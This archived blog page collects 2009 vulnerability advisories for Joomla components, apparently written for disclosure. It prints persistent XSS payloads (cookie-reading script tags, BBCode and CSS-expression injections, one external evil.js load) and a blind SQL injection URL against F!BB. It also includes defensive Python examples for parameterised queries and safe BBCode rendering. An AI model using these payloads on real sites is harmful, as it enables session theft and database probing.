jeffchannell.com

EasyBook 2.0.0rc4 Multiple XSS Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component EasyBook 2.0.0rc4 suffers from multiple persistent XSS vulnerabilities. One seems fairly critical, while the others would take some incredible creativity to actively exploit.

  1. BBCode XSS

    Settings:

    • Allow BBCode - on (default)
    • Allow Pictures - on (not default)
    [img]fake.png" onerror="alert(String.fromCharCode(88,83,83))[/img]
  2. Website URL XSS

    Settings:

    • Show web site field: Show (default)
    foo.com" onmouseover="alert(String.fromCharCode(88,83,83));return false;

    Requires minimal user interaction

  3. Skype/Yahoo Username XSS

    Very narrow scope, as entries are truncated. XSS still technically possible. Requires user interaction.

    ' onclick="alert('XSS')"
  4. AIM/MSN Username XSS

    Again, narrow scope. See 3.

    " onclick="alert('xss')"

    ICQ username is similar, but scope seems too narrow to exploit.

ccBoard 1.1-RC XSS Vulnerability

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component ccBoard 1.1-RC suffers from a Cross Site Scripting vulnerability if certain conditions are met. The forum must be set up to use the internal HTML editor and not bbCode. This is the default setting upon install.

To execute, simply post a new message. Either toggle the editor to 'off' or use the HTML Source editing button, insert your JavaScript, and submit!

<script>alert('xss');</script>

The editor was even nice enough to make my XSS injection pretty upon saving:

<script type="text/javascript">// <![CDATA[
alert('xss');
// ]]></script>

F!BB 1.5.96 RC Multiple Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component F!BB 1.5.96 RC suffers from multiple persistent XSS vulnerabilities, as well as SQL injection in its user search feature.

  1. ICQ, MSN Profile Fields XSS

    The MSN field will be rendered in the page twice.
    "><script>alert(document.cookie)</script><b f="
  2. AIM Profile Field XSS

    This field accepts only a limited number of characters, but the following will still inject script:
    "><script src=//jeffchannell.com/evil.js></script
    NOTE: Skype, Gtalk, website fields are also vulnerable, though the window for injection is even smaller!
  3. Blind SQL Injection

    REQUIRES: magic_quotes_gpc OFF
    index.php?option=com_fbb&func=advsearch&q=&exactname=1&childforums=1&limitstart=0&searchuser=%' AND SUBSTRING(@@version,1,1)=5 -- '
    If MySQL is version 5, this will return results. Otherwise, no results.
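An added example, not F!BB's own code, contrasting the search pattern the advisory describes (user input concatenated into a LIKE clause, where only magic_quotes_gpc stood between a quote and the query) with a bound parameter plus LIKE wildcard escaping. It uses an in-memory sqlite3 table; the table, column and function names are assumptions for the demo.

```python
import sqlite3


def make_db():
    """Constructed sample data; not F!BB's real schema."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    db.executemany("INSERT INTO users (username) VALUES (?)",
                   [("alice",), ("bob",), ("bob_the_builder",)])
    return db


def search_users_unsafe(db, searchuser):
    """The vulnerable shape: the value is spliced into the SQL text, so a quote
    in the input terminates the string and the rest is parsed as SQL."""
    sql = f"SELECT username FROM users WHERE username LIKE '{searchuser}%' ORDER BY id"
    return [row[0] for row in db.execute(sql)]


def search_users_safe(db, searchuser):
    """Bind the value as a parameter and escape the LIKE metacharacters, so the
    input is only ever matched as text and % or _ cannot widen the match."""
    pattern = (searchuser.replace("\\", "\\\\")
                         .replace("%", "\\%")
                         .replace("_", "\\_")) + "%"
    sql = "SELECT username FROM users WHERE username LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in db.execute(sql, (pattern,))]
```

The boolean trick from the advisory (a condition that is either true or false) changes the unsafe result set, while the safe version treats the same string as a literal prefix that matches nothing.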

Rapid Forum XSS Vulnerability

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component Rapid Forum suffers from a persistent XSS vulnerability.

This vulnerability is pretty easy to exploit, as Rapid Forum does absolutely no validation or encoding whatsoever.
<script>alert(document.cookie)</script>

Simplest Forum BBCode Plugin 1.0.0 Beta 2 XSS Vulnerability

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Simplest Forum BBCode Plugin 1.0.0 Beta 2 for Joomla suffers from a persistent XSS vulnerability that allows injection of arbitrary CSS rules through the [color] tag.

[color=#FF0000;font-size:100px]XSS[/color]

Testimonial Ku 2.0 Admin Panel Persistent XSS

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

The Joomla component Testimonial Ku 2.0 is vulnerable to persistent XSS in the administrator panel. A malicious user can submit a testimonial containing <script> tags with absolutely no quotes and inject that script into the administrator panel through any of the available inputs except "email".

Fake Submission<script>alert(document.cookie)</script>

Now, when an administrator views the latest submissions, the script will execute with that admin's permissions.

MS Comment 0.8.0b Multiple Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

MS Comment 0.8.0b for Joomla, a commenting plugin, suffers from multiple vulnerabilities.

  1. Captcha Cracking

    The submission uses AJAX and fails to reset the captcha after a submission. Read once, write many.
  2. Website Input XSS

    The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.
    " onmouseover="alert(String.fromCharCode(88,83,83))
    " style="color:expression(alert(String.fromCharCode(88,83,83)))

Timeline

  • Vulnerabilities Discovered: 31 July 2009
  • Vendor Notified: 31 July 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 17 September 2009

!JoomlaComment 4.0 beta1 Multiple XSS Vulnerabilities

Posted in Joomla!
2009-09-17 05:00:00 +0000 UTC

!JoomlaComment 4.0 beta1, a commenting plugin, suffers from multiple XSS vulnerabilities.

  1. Website Input XSS

    The 'Website' input field is checked for html markup, but fails to sanitize extra parameters.
    ' onmouseover='alert(String.fromCharCode(88,83,83))
    ' style='color:expression(alert(String.fromCharCode(88,83,83)))
  2. [img] BBCode Tag XSS

    [img]http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))[/img]
  3. [url] BBCode Tag XSS

    [url=http://pick.a.big/image.png' onmousemove='javascript:alert(String.fromCharCode(88,83,83))]XSS[/url]
  4. [size] BBCode Tag XSS

    [size=large;color:expression(alert(String.fromCharCode(88,83,83)))]XSS[/size]
    This XSS vulnerability executes in the administrator area as well.
  5. [color] BBCode Tag XSS

    [color=red;font-size:expression(alert(String.fromCharCode(88,83,83)))]XSS[/color]
    This XSS vulnerability executes in the administrator area as well.
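An added example, not code from !JoomlaComment, EasyBook or MS Comment, showing how the two field types abused across these advisories can be rendered safely: the profile "Website" field (EasyBook item 2, MS Comment item 2, !JoomlaComment item 1) and the [img], [url], [size] and [color] BBCode tags (EasyBook item 1, !JoomlaComment items 2 to 5). Everything is HTML-escaped first, and markup is only reintroduced around values that pass a strict allow-list, so a quote that would break out of an attribute or a `;` that would smuggle an extra CSS property simply stays inert text. The tag grammar, colour and size allow-lists are assumptions.

```python
import html
import re
from urllib.parse import urlparse

COLOR_RE = re.compile(r"^(#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6}|[a-zA-Z]{1,20})$")
SIZES = {"small": "0.8em", "normal": "1em", "large": "1.5em"}  # assumed names


def safe_url(value):
    """Return an attribute-escaped http(s) URL, or None if the value is not one."""
    value = value.strip()
    try:
        parsed = urlparse(value)
    except ValueError:  # e.g. unbalanced IPv6 brackets
        return None
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return None
    if re.search(r'["\'<>\s]', value):  # anything that could close the attribute
        return None
    return html.escape(value, quote=True)


def render_website(value):
    """Profile 'Website' field: a validated link, otherwise inert escaped text."""
    url = safe_url(value if "://" in value else "http://" + value)
    text = html.escape(value, quote=True)
    return f'<a href="{url}">{text}</a>' if url else text


def render_bbcode(text):
    """Escape everything first; re-introduce markup only around validated values."""
    out = html.escape(text, quote=True)

    def img(m):
        url = safe_url(html.unescape(m.group(1)))
        return f'<img src="{url}" alt="">' if url else m.group(0)

    def link(m):
        url = safe_url(html.unescape(m.group(1)))
        return f'<a href="{url}">{m.group(2)}</a>' if url else m.group(0)

    def color(m):
        val = html.unescape(m.group(1))  # a lone colour, never "red;font-size:..."
        ok = COLOR_RE.match(val)
        return f'<span style="color:{val}">{m.group(2)}</span>' if ok else m.group(0)

    def size(m):
        css = SIZES.get(html.unescape(m.group(1)).lower())
        return f'<span style="font-size:{css}">{m.group(2)}</span>' if css else m.group(0)

    out = re.sub(r"\[img\](.+?)\[/img\]", img, out, flags=re.S)
    out = re.sub(r"\[url=([^\]]+)\](.*?)\[/url\]", link, out, flags=re.S)
    out = re.sub(r"\[color=([^\]]+)\](.*?)\[/color\]", color, out, flags=re.S)
    out = re.sub(r"\[size=([^\]]+)\](.*?)\[/size\]", size, out, flags=re.S)
    return out
```

Rejected values are left as the escaped original text rather than dropped, so a user sees their mistyped input instead of silently losing it.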

Change Component Heading on SOBI2

Posted in Joomla!
2009-09-09 17:20:35 +0000 UTC

I was in need of a fix for the Joomla! component SOBI2, as a client wanted the title to reflect the current category and listing, instead of always having the name of the directory. After searching the web, I found an older post on the Sigsiu forums dealing with this. After rewriting a portion to reflect changes in SOBI2 since this was posted and applying this fix, however, I found that my copy of IE6 was throwing a very strange error: 80004004.

Joomla Reset Password Insecurity

Posted in Joomla!
2009-08-31 04:04:16 +0000 UTC

The methods used by the Joomla core to validate tokens generated by a password reset request are a weak spot in the security of the system when coupled with the introduction of insecure third party components. A fundamental change in this handling could assist in hardening a typical Joomla web site. I am proposing an added security measure to the Joomla core in order to mitigate possible intrusion due to vulnerabilities in third party components.